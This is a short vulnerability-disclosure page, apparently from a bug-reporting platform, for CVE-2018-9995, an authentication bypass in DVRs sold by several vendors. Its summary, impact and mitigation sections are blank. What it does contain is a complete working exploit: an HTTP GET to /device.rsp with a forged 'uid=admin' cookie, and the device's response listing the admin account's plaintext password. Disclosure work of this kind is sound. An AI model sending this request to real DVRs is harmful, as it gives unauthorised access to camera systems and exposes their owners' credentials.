UIDDISCLOSE
HighCVE-2018-9995CWE-306

[DVR TBK] bypass de autenticación en DVR (multi vendor ) - CVE-2018-9995

Disclosure basesAlready public vulnerabilityFixed by the affected party
  • CVE-2018-9995
Written by
ezequiel fernandez@CapitanAlfa
0
Community vote
Credits — original finding and research

Acknowledgements declared by @CapitanAlfa, who wrote this writeup. The platform does not verify them.

7.5
High
CVSS 3.1 base score
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
// Executive summary
// Reproduction steps
// Affected surface
URL
http://192.168.0.121:8080/device.rsp?opt=user&cmd=list
Endpoint
/device.rsp
Parameter
?opt=user&cmd=list
GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: 192.168.0.121:8080
Cookie: uid=admin
User-Agent: Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)
Accept: */*
Connection: close

HTTP/1.0 200 OK
Content-type: text/html; charset=UTF-8
Server: GNU rsp/1.0
Content-Language: en
Expires: -1
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: private, max-age=0
Connection: close
Date: Thu, 17 Sep 2026 20:19:57 GMT


{
  "result": 0, 
  "list": [
    {
      "uid": "admin", 
      "pwd": "rajabi0016", 
      "role": 2, 
      "enmac": 0, 
      "mac": "00:00:00:00:00:00", 
      "playback": 4294967295, 
      "view": 4294967295, 
      "rview": 4294967295, 
      "ptz": 4294967295, 
      "backup": 4294967295, 
      "opt": 4294967295
    }
  ]
}
// Impact
// Mitigation

Comments

0